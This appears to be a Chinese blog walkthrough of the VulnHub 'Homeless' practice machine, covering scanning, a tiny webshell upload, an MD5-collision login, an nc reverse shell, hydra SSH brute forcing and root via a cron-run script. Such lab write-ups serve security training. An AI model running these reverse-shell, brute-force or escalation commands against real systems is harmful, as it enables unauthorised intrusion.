您的位置: 首页  >  文章  >  渗透测试之靶机试炼(十)

渗透测试之靶机试炼(十)

分类: 文章 2024-07-29 08:21:46

靶机简介

靶机地址:
https://download.vulnhub.com/homeless/

运行环境:
VirtualBox

攻击测试机环境
kali
win 10
工具简介

nmap
dirb
python
nc
burp
curl
fastcoll
tail

靶机网卡设置

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。

渗透测试之靶机试炼(十)首先使用nmap进行主机IP发现
命令:nmap 10.211.55.0/24
渗透测试之靶机试炼(十)从结果中得知靶机开启了80端口与22端口,应该是常规web渗透于ssh登录
访问80端口
渗透测试之靶机试炼(十)页面没发现什么可用信息,查看源码
渗透测试之靶机试炼(十)发现这里有点奇怪,把我的User-Agent打印出来了
然而并没有突破性发现 常规思路 扫目录
命令:dirb http://10.211.55.49/
渗透测试之靶机试炼(十)法案robots.txt文件,访问
渗透测试之靶机试炼(十)给了一些提示 rockyou是kali自带的字典 但是并不知道需要干什么,在这里陷入了沉思。。。。。
想到之前找到的那个打印User-Agent,是不是有其他用途,抓包更改
渗透测试之靶机试炼(十)不论你输入什么,他都会直接打印返回,猜想是否需要输入正确的字符串才会给提示。好吧,继续信息收集吧
到最后也没找到,去网上找教程了
发现说是主页的源码里的图片有问题
http://10.211.55.49/images/favicon.jpg
渗透测试之靶机试炼(十)说是最顶端有一排字,这谁看的清啊
不管怎么说,继续搞吧
教程说 将User-Agent内容替换为cyberdog就会给提示
继续吧
渗透测试之靶机试炼(十)果然给了一个目录 访问
渗透测试之靶机试炼(十)是个上传页面
渗透测试之靶机试炼(十)想直接上传个木马 呵呵想的太简单了 一句话都显示文件大 做了大小限制,经过测试只能上传8个字符
渗透测试之靶机试炼(十)百度一下最短webshell,找到一种方法可以执行命令
渗透测试之靶机试炼(十)
传上去看看

渗透测试之靶机试炼(十)这里直接给了目录,我们访问
渗透测试之靶机试炼(十)给了一个txt文件 访问
渗透测试之靶机试炼(十)又给了一个id目录 访问
渗透测试之靶机试炼(十)看到上面有一个提示 点击
渗透测试之靶机试炼(十)下载了主页备份文件,登录窗口三个输入框,要求输入的之不一样 但是MD5一样
这里又看了教程 没百度到
使用三个exe文件
fastcoll下载链接:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

tail.exe下载链接:https://www.trisunsoft.com/tail-for-windows.htm

curl.exe下载链接:https://curl.haxx.se/windows/

利用这三个exe程序生成三个名称不同但是MD5相同的 按照大牛的教程 如下

D:\fastcoll>fastcoll_v1.0.0.5.exe -o jlzj0 jlzj1      
#-o参数代表随机生成两个相同MD5的文件
D:\fastcoll>fastcoll_v1.0.0.5.exe -p jlzj1 -o jlzj00 jlzj01  
#-p参数代表根据jlzj1文件随机生成两个相同MD5的文件,注意:生成的MD5与jlzj1不同
D:\fastcoll>tail.exe -c 128 jlzj00 > a                
#-c 128代表将jlzj00的最后128位写入文件a,这128位正是jlzj1与jlzj00的MD5不同的原因
D:\fastcoll>tail.exe -c 128 jlzj01 > b                
#同理
D:\fastcoll>type jlzj0 a > jlzj10                    
#这里表示将jlzj0和a文件的内容合并写入jlzj10
D:\fastcoll>type jlzj0 b > jlzj11                    
#同理写入jlzj11

最终执行
curl.exe --data-urlencode [email protected]:\fastcoll\jlzj00 --data-urlencode [email protected]:\fastcoll\jlzj01 --data-urlencode [email protected]:\fastcoll\jlzj10 --data-urlencode “remember=1&login=Login” http://10.211.55.8/d5fa314e8577e3a7b8534a014b4dcb221de823ad/index.php -i
获取cookie
渗透测试之靶机试炼(十)利用获取的cookie进入系统admin.php页面
渗透测试之靶机试炼(十)给了一个命令执行的页面,可以直接拿到shell
本地监听
nc -lvp 1234
渗透测试之靶机试炼(十)
命令执行
nc -e /bin/bash 10.211.55.8 1234
渗透测试之靶机试炼(十)获取了shell
利用python 获取交互式shell
python -c ‘import pty;pty.spawn("/bin/bash")’
在home目录下发现一个用户,进去发现有些文件没有去权限看
渗透测试之靶机试炼(十)这里使用hydra进行密码**
hydra -l downfall -P rockyou.txt 10.211.55.49 ssh
之前提示的密码文件使用rockyou.txt 为kali自带的密码文件位置:/usr/share/wordlist/rockyou.txt
渗透测试之靶机试炼(十)得到密码后我们ssh连接
渗透测试之靶机试炼(十)通过查看用户目录下文件得知在/lib/logs/目录下存在一个py脚本文件
渗透测试之靶机试炼(十)
切换到/lib/logs目录下,会提示一条消息,你有一封新邮件/var/mail/downfall
我们去查看
渗透测试之靶机试炼(十)发现系统每分钟会以root权限执行命令cd /lib/logs/ && ./homeless.py
我们修改py脚本即可获取root权限
修改homeless.py内容如下
渗透测试之靶机试炼(十)保存 本地监听8899端口
渗透测试之靶机试炼(十)
获取root权限。

相关推荐